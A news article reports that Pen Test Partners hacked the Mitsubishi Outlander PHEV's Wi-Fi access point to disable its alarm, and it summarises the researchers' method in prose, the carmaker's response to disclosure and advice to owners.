Mitsubishi Outlander car alarm vulnerable to hacking

It’s the stuff of every corporate giant’s nightmare — reports of product security vulnerabilities — and the latest in the spotlight is Japanese carmaker Mitsubishi with its Outlander plug-in hybrid electric vehicle (PHEV).

The vehicle’s Wi-Fi access point has been successfully hacked by security experts from Pen Test Partners, allowing them to turn off the vehicle’s alarm system and leave the car open to potential theft.

By infiltrating the Outlander’s Wi-Fi module, the security company said it could not only disengage the alarms but could also change settings and drain battery life.

Pen Test Partners said that the model has an “unusual” method of connecting the mobile app to the car. Instead of relying on a typical GSM module, it hosts a Wi-Fi access point. In order to connect to the car functions, drivers have to disconnect from any other Wi-Fi networks and explicitly connect to the car AP. However, as the company wrote in its blog, this system has not been implemented securely.

“The Wi-Fi pre shared key is written on a piece of paper included in the owner’s manual. The format is too simple and too short,” said the team. “We cracked it on a 4 x GPU cracking rig at less than 4 days. A much faster crack could be achieved with a cloud-hosted service, or by buying more GPUs.”

Capturing the handshake, they said, was more of a challenge as the mobile device would have to be connected to the car at the time. “We realised that the car was most likely to be parked at the owner’s house, where their mobile device would also be. By de-authing the mobile from the home Wi-Fi router continuously, there was a fair chance of it then connecting to the nearby car, at which point the handshake could be captured,” wrote the company.

From there they were able to set up a man-in-the-middle attack to monitor the data flowing between app and vehicle, as well as compromise the car’s system by accessing the onboard diagnostics port.

According to cybersecurity researcher Mark Skilton, Professor at the University of Warwick in the UK, failures of poorly configured Wi-Fi security access have occurred in other high-profile cases in the past couple of years.

“These are not a failure of the system itself. All these hacks exploited poor design of the systems’ security design. In all these cases the entry point has been compromised and it allowed the hacker to gain access to other systems onboard that could include and threaten human safety,” said Professor Skilton.

“Cars are increasingly having onboard connectivity to the internet beyond just entertainment and to the operation of the car itself. But, while access to email and websites is one thing, access to mission-critical systems in any situation — be it a building, operating theatre or transport vehicle — is a whole different set of risk and security issues.”

Pen Test Partners said initial attempts to disclose privately to Mitsubishi were greeted with disinterest and they were only taken seriously when the media became involved. They said the car firm is now taking the issue very seriously and is working on a medium-term fix for consumers.

Before then, Pen Test Partners encourages all Mitsubishi Outlander PHEV owners to immediately unpair all mobile devices that have been connected to the car access point.

For information on how to do this, read their blog here.

Image courtesy of Kārlis Dambrāns under CC-BY-2.0